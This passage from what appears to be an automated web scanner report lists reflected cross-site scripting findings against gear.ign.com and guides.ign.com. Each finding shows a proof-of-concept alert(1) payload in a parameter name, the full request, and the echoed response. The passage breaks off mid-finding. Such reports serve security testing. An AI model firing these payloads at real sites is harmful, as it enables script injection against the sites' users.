The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75409"-alert(1)-"034fd7420f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?75409"-alert(1)-"034fd7420f0=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-879256091-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043498665v-1n-12mc+1297043498665mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>IGN Gear: Previews
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://gear.ign.com/?75409"-alert(1)-"034fd7420f0=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.213. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /articles/114/1147945p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc7c9"><script>alert(1)</script>5f62f771290 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/114/1147945p1.html?bc7c9"><script>alert(1)</script>5f62f771290=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-1148740613-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:30 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043490358v-1n-12mc+1297043490358mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 102514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://gear.ign.com/articles/114/1147945p1.html?bc7c9"><script>alert(1)</script>5f62f771290=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.214. http://gear.ign.com/articles/114/1147945p1.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gear.ign.com
Path:   /articles/114/1147945p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ba9e"-alert(1)-"ed46ab3021e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/114/1147945p1.html?4ba9e"-alert(1)-"ed46ab3021e=1 HTTP/1.1
Host: gear.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 07 Feb 2011 01:51:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:51:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2993-1930050444-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043492260v-1n-12mc+1297043492260mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 102434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
scoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://gear.ign.com/articles/114/1147945p1.html?4ba9e"-alert(1)-"ed46ab3021e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.215. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c05a"-alert(1)-"dc219b0b059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9c05a"-alert(1)-"dc219b0b059=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:54:12 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-721810951-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:54:12 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043653040v-1n-12mc+1297043653040mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 563591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/?9c05a"-alert(1)-"dc219b0b059=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.216. http://guides.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a5bc"><script>alert(1)</script>3d8e7077c65 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a5bc"><script>alert(1)</script>3d8e7077c65=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:54:05 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c08-31833-2109221874-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:54:05 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043645309v-1n-12mc+1297043645309mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 563668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/?4a5bc"><script>alert(1)</script>3d8e7077c65=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.217. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14235018/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47a84"><script>alert(1)</script>564c920195a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14235018/?47a84"><script>alert(1)</script>564c920195a=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13836-259185475-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043509360v-1n-12mc+1297043509360mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14235018/?47a84"><script>alert(1)</script>564c920195a=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.218. http://guides.ign.com/guides/14235018/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14235018/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f02f6"-alert(1)-"f03fa2e9ceb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14235018/?f02f6"-alert(1)-"f03fa2e9ceb=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:54 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-1875560547-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:54 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043514177v-1n-12mc+1297043514177mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 100999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14235018/?f02f6"-alert(1)-"f03fa2e9ceb=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.219. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14293266/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc77b"-alert(1)-"9efbf2b5b8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14293266/?cc77b"-alert(1)-"9efbf2b5b8b=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:41 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-726416638-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:41 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043501702v-1n-12mc+1297043501702mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 95333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14293266/?cc77b"-alert(1)-"9efbf2b5b8b=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.220. http://guides.ign.com/guides/14293266/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14293266/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53311"><script>alert(1)</script>b8a60daf5cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14293266/?53311"><script>alert(1)</script>b8a60daf5cb=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:36 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24874-1286270057-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:36 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043496552v-1n-12mc+1297043496552mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 95368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14293266/?53311"><script>alert(1)</script>b8a60daf5cb=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.221. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14341976/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a72d"-alert(1)-"d0fe4cf0b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14341976/?2a72d"-alert(1)-"d0fe4cf0b4=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:58 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-27586-60180781-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:58 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043518742v-1n-12mc+1297043518742mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 96168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14341976/?2a72d"-alert(1)-"d0fe4cf0b4=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.222. http://guides.ign.com/guides/14341976/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14341976/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b0f8"><script>alert(1)</script>c82848e0415 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14341976/?2b0f8"><script>alert(1)</script>c82848e0415=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:51 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13272-570928520-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:51 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043511894v-1n-12mc+1297043511894mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 101523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14341976/?2b0f8"><script>alert(1)</script>c82848e0415=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.223. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14349501/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79fa1"><script>alert(1)</script>4d9b8b5138e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14349501/?79fa1"><script>alert(1)</script>4d9b8b5138e=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-22919-1800780367-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043509127v-1n-12mc+1297043509127mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 97958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://guides.ign.com/guides/14349501/?79fa1"><script>alert(1)</script>4d9b8b5138e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.224. http://guides.ign.com/guides/14349501/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14349501/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2f36"-alert(1)-"33758481171 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14349501/?a2f36"-alert(1)-"33758481171=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-19323-1777948420-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043513101v-1n-12mc+1297043513101mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 97926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14349501/?a2f36"-alert(1)-"33758481171=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.225. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14354229/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa952"-alert(1)-"9cf633cfd9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:51:44 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-24030-1024535077-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:51:44 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297043504486v-1n-12mc+1297043504486mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 103450

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://guides.ign.com/guides/14354229/?aa952"-alert(1)-"9cf633cfd9a=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.226. http://guides.ign.com/guides/14354229/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://guides.ign.com
Path:   /guides/14354229/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63fce"><script>alert(1)</script>0df05f822a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides/14354229/?63fce"><script>alert(1)</script>0df05f822a8=1 HTTP/1.1
Host: guides.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
